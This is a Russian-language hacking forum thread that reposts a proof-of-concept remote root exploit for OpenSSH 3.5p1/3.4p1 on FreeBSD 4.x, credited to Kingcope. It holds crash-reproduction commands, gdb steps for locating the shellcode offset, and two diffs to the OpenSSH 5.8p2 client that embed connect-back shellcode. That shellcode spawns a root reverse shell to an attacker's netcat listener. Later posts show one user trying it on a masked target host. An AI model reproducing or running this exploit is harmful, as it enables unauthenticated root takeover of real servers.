Старый 30.06.2011, 17:50   #1
SynQ
 
Регистрация: 11.07.2010
Сообщений: 953
Репутация: 352
По умолчанию OpenSSH 3.5p1 Remote Root Exploit for FreeBSD 4.X

Только из печки.

Пока не сильно юзабельно, но думаю вскоре последует вторая версия.
Представляет из себя дифф к клиенту OpenSSH-5.8p2, в который надо вставить offset из coredump.
Пока работает только на sshd, который запустили из консоли, а не автоматически при загрузке.

Цитата:
OpenSSH 3.5p1 Remote Root Exploit for FreeBSD
Discovered and Exploited By Kingcope
Year 2011
--

The last two days I have been investigating a vulnerability in OpenSSH
affecting at least FreeBSD 4.9 and 4.11. These FreeBSD versions run
OpenSSH 3.5p1 in the default install.

The sshd banner for 4.11-RELEASE is "SSH-1.99-OpenSSH_3.5p1 FreeBSD-20060930".

A working Remote Exploit which spawns a root shell remotely and
previous to authentication was developed.

The bug can be triggered both through ssh version 1 and ssh version 2
using a modified ssh client. During the investigation of the vulnerability it was found that
the bug resides in the source code file "auth2-pam-freebsd.c".

http://www.freebsd.org/cgi/cvsweb.cgi/src/crypto/openssh/Attic/auth2-pam-freebsd.c

This file does not exist in FreeBSD releases greater than 5.2.1. The last commit
is from 7 years ago.

Specifically the bug follows a code path in the PAM Authentication Thread inside this
source code, "pam_thread()". It could not be verified if the bug is inside this
(third party, freebsd) OpenSSH code or in the FreeBSD pam library itself.

Both the challenge response (ssh version 1) and keyboard interactive via pam
(ssh version 2) authentications go through this code path.

By supplying a long username to the daemon the sshd crashes.

h4x# sysctl kern.sugid_coredump=1
kern.sugid_coredump: 0 -> 1

root@debian:~# ssh -l`perl -e 'print "A" x 100'` 192.168.32.138

h4x# tail -1 /var/log/messages
Jun 30 16:01:25 h4x /kernel: pid 160 (sshd), uid 0: exited on signal 11 (core dumped)

Looking into the coredump reveals:

h4x# gdb -c /sshd.core
GNU gdb 4.18 (FreeBSD)
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-unknown-freebsd".
Core was generated by `sshd'.
Program terminated with signal 11, Segmentation fault.
#0 0x28092305 in ?? ()
(gdb) x/1i $eip
0x28092305: (bad)

The sshd crahes at a place with illegal instructions. It looks like it depends
on how the sshd is started. Starting the sshd from the console as root and running
the ssh client with long username again reveals:

h4x# killall -9 sshd
h4x# /usr/sbin/sshd

root@debian:~# ssh -l`perl -e 'print "A" x 100'` 192.168.32.138

h4x# gdb -c /sshd.core
GNU gdb 4.18 (FreeBSD)
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-unknown-freebsd".
Core was generated by `sshd'.
Program terminated with signal 11, Segmentation fault.
#0 0x41414141 in ?? ()
(gdb) x/10i $eip
0x41414141: Cannot access memory at address 0x41414141.

As you can see in the above gdb output we can control EIP completely.
If someone finds out on what this behaviour depends, especially why EIP can
be controlled when starting sshd in the console and can not be easily controlled
when being run from the boot sequence, please drop me an email at
isowarez.isowarez.isowarez@googlemail.com.

Anyhow this procedure shows that the sshd can be exploited because the instruction
pointer can be fully controlled.

The developed exploit (Proof of Concept only) is a patched OpenSSH 5.8p2 client.
Using a reverse shellcode it will spawn a rootshell.

Only one offset is needed, the position of the shellcode can be found the following way:

h4x# gdb -c /sshd.core
GNU gdb 4.18 (FreeBSD)
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-unknown-freebsd".
Core was generated by `sshd'.
Program terminated with signal 11, Segmentation fault.
#0 0x41414141 in ?? ()
(gdb) set $x=0x08071000
(gdb) while(*++$x!=0x90909090)
>end
(gdb) x/10b $x

The printed address is the beginning of the shellcode nopsled.

Attached is the Proof of Concept as a diff to OpenSSH-5.8p2.

It roughly does the following:

root@debian:~# ./ssh -1 192.168.32.138

root@debian:~# nc -v -l -p 10000
listening on [any] 10000 ...
192.168.32.138: inverse host lookup failed: Unknown host
connect to [192.168.32.128] from (UNKNOWN) [192.168.32.138] 1038
uname -a;id;
FreeBSD h4x.localdomain 4.11-RELEASE FreeBSD 4.11-RELEASE #0: Fri Jan 21 17:21:22 GMT 2005 root@perseus.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i386
uid=0(root) gid=0(wheel) groups=0(wheel)

--

root@debian:~# diff openssh-5.8p2/sshconnect1.c openssh-5.8p2_2/sshconnect1.c
667a668,717
> // Connect Back Shellcode
>
> #define IPADDR "\xc0\xa8\x20\x80"
> #define PORT "\x27\x10" /* htons(10000) */
>
> char sc[] =
> "\x90\x90"
> "\x90\x90"
> "\x31\xc9" // xor ecx, ecx
> "\xf7\xe1" // mul ecx
> "\x51" // push ecx
> "\x41" // inc ecx
> "\x51" // push ecx
> "\x41" // inc ecx
> "\x51" // push ecx
> "\x51" // push ecx
> "\xb0\x61" // mov al, 97
> "\xcd\x80" // int 80h
> "\x89\xc3" // mov ebx, eax
> "\x68"IPADDR // push dword 0101017fh
> "\x66\x68"PORT // push word 4135
> "\x66\x51" // push cx
> "\x89\xe6" // mov esi, esp
> "\xb2\x10" // mov dl, 16
> "\x52" // push edx
> "\x56" // push esi
> "\x50" // push eax
> "\x50" // push eax
> "\xb0\x62" // mov al, 98
> "\xcd\x80" // int 80h
> "\x41" // inc ecx
> "\xb0\x5a" // mov al, 90
> "\x49" // dec ecx
> "\x51" // push ecx
> "\x53" // push ebx
> "\x53" // push ebx
> "\xcd\x80" // int 80h
> "\x41" // inc ecx
> "\xe2\xf5" // loop -10
> "\x51" // push ecx
> "\x68\x2f\x2f\x73\x68" // push dword 68732f2fh
> "\x68\x2f\x62\x69\x6e" // push dword 6e69622fh
> "\x89\xe3" // mov ebx, esp
> "\x51" // push ecx
> "\x54" // push esp
> "\x53" // push ebx
> "\x53" // push ebx
> "\xb0\xc4\x34\xff"
> "\xcd\x80"; // int 80h
>
679a730,737
> char buffer[8096];
>
> // Offset is for FreeBSD-4.11 RELEASE OpenSSH 3.5p1
> memcpy(buffer, "AAAA\x58\xd8\x07\x08""CCCCDDDDEEEE\xd8\xd8\x07\x0 8""GGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOO", 24);
> memset(buffer+24, '\x90', 5000);
> memcpy(buffer+24+5000, sc, sizeof(sc));
> server_user=buffer;
>
690a749
>

Последний раз редактировалось SynQ; 30.06.2011 в 17:56..
SynQ вне форума   Ответить с цитированием
Старый 01.07.2011, 10:03   #2
kfor
 
Аватар для kfor
 
Регистрация: 27.01.2011
Сообщений: 120
Репутация: 39
По умолчанию

Охо. Давненько не было сплойтиков Да ещё и на ssh. Я вот только не понял почему для него есть разница запущенный из консоли или системой.
kfor вне форума   Ответить с цитированием
Старый 01.07.2011, 15:52   #3
b3
 
Аватар для b3
 
Регистрация: 18.08.2010
Сообщений: 352
Репутация: 105
По умолчанию

мб из-за пользователя
b3 вне форума   Ответить с цитированием
Старый 01.07.2011, 20:22   #4
SynQ
 
Регистрация: 11.07.2010
Сообщений: 953
Репутация: 352
По умолчанию

Как и ожидалось, второй эксплойт для 2х версий:
SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702
SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924

Скомпилированный эксплойт

Дифф для openssh 5.8p2 ниже.

Цитата:
run like ./ssh -1 -z <yourip> <target>
setup a netcat, port 443 on yourip first

a statically linked linux binary of the exploit can be found below
attached is a diff to openssh-5.8p2.


diff openssh-5.8p2/ssh.c openssh-5.8p2_2/ssh.c
149a150
> char *myip;
195a197,203
> "OpenSSH FreeBSD Remote Root Exploit\n"
> "By Kingcope\n"
> "Year 2011\n\n"
> "Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702\n"
> "Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924\n"
> "run like ./ssh -1 -z <yourip> <target>\n"
> "setup a netcat, port 443 on yourip first\n\n"
299c307
< while ((opt = getopt(ac, av, "1246ab:c:e:fgi:kl:m:no:p:qstvx"
---
> while ((opt = getopt(ac, av, "1246ab:c:e:fgi:kl:m:no:z:p:qstvx"
335a344,346
> break;
> case 'z':
> myip = optarg;
diff openssh-5.8p2/sshconnect1.c openssh-5.8p2_2/sshconnect1.c
667a668,719
> //IP=\xc0\xa8\x20\x80
> #define IPADDR "\xc0\xa8\x20\x80"
> #define PORT "\x27\x10" /* htons(10000) */
>
> char sc[] =
> "\x90\x90"
> "\x90\x90"
> "\x31\xc9" // xor ecx, ecx
> "\xf7\xe1" // mul ecx
> "\x51" // push ecx
> "\x41" // inc ecx
> "\x51" // push ecx
> "\x41" // inc ecx
> "\x51" // push ecx
> "\x51" // push ecx
> "\xb0\x61" // mov al, 97
> "\xcd\x80" // int 80h
> "\x89\xc3" // mov ebx, eax
> "\x68"IPADDR // push dword 0101017fh
> "\x66\x68"PORT // push word 4135
> "\x66\x51" // push cx
> "\x89\xe6" // mov esi, esp
> "\xb2\x10" // mov dl, 16
> "\x52" // push edx
> "\x56" // push esi
> "\x50" // push eax
> "\x50" // push eax
> "\xb0\x62" // mov al, 98
> "\xcd\x80" // int 80h
> "\x41" // inc ecx
> "\xb0\x5a" // mov al, 90
> "\x49" // dec ecx
> "\x51" // push ecx
> "\x53" // push ebx
> "\x53" // push ebx
> "\xcd\x80" // int 80h
> "\x41" // inc ecx
> "\xe2\xf5" // loop -10
> "\x51" // push ecx
> "\x68\x2f\x2f\x73\x68" // push dword 68732f2fh
> "\x68\x2f\x62\x69\x6e" // push dword 6e69622fh
> "\x89\xe3" // mov ebx, esp
> "\x51" // push ecx
> "\x54" // push esp
> "\x53" // push ebx
> "\x53" // push ebx
> "\xb0\xc4\x34\xff"
> "\xcd\x80"; // int 80h
>
>
> extern char *myip;
>
678a731,748
>
> char buffer[100000];
>
> printf("OpenSSH Remote Root Exploit\n");
> printf("By Kingcope\n");
> printf("Year 2011\n\n");
> printf("Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702\n");
> printf("Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924\n");
> printf("Connect back to: %s:443\n", myip);
>
> *((unsigned long*)(sc + 21)) = inet_addr(myip);
> *((unsigned short*)(sc + 27)) = htons(443);
>
> memset(buffer, 'V', 8096);
> memcpy(buffer+24, "\x6b\x4b\x0c\x08", 4); // SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702
> memset(buffer+28, '\x90', 65535);
> memcpy(buffer+28+65535, sc, sizeof(sc));
> server_user=buffer;

Последний раз редактировалось SynQ; 01.07.2011 в 20:25..
SynQ вне форума   Ответить с цитированием
Старый 24.02.2012, 21:42   #5
12309
 
Регистрация: 25.12.2011
Сообщений: 265
Репутация: 33
По умолчанию

screen 1:
Цитата:
[root@*****1]# nc -v -l -p 443
listening on [any] 443 ...
screen 2:
Цитата:
[root@*****1]# ./.ssh -1 -z *****1 *****2
WARNING: DSA key found for host *****2
in /root/.ssh/known_hosts:4
DSA key fingerprint a5:5d:6d:e4:1e:dc:87:69:5f:3c:4a:cd:ed:**:**:**.
The authenticity of host '*****2 (*****2)' can't be established
but keys of different type are already known for this host.
RSA1 key fingerprint is 33:4e:9d:84:db:6b:35:2f:97:e8:54:64:94:**:**:**.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '*****2' (RSA1) to the list of known hosts.
OpenSSH Remote Root Exploit
By Kingcope
Year 2011

Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702
Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924
Connect back to: *****1:443
VVVVVVVVVVVVVVVVVVVVVVVVk��@*****2's password:
Permission denied, please try again.
VVVVVVVVVVVVVVVVVVVVVVVVk��@*****2's password:
^C
screen 1:
Цитата:
[root@*****1]# nc -v -l -p 443
listening on [any] 443 ...
<и_тут_ничего_нового>
screen 3:
Цитата:
[root@*****1]# telnet *****2 22
Trying *****2...
Connected to *****2 (*****2).
Escape character is '^]'.
SSH-1.99-OpenSSH_3.5p1 FreeBSD-20030924
12309 вне форума   Ответить с цитированием
Старый 25.02.2012, 02:46   #6
12309
 
Регистрация: 25.12.2011
Сообщений: 265
Репутация: 33
По умолчанию

в сплоенте-то всего один оффсет, для SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702, а не для SSH-1.99-OpenSSH_3.5p1 FreeBSD-20030924.
12309 вне форума   Ответить с цитированием
Ответ

Метки
exploit, freebsd, openssh

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot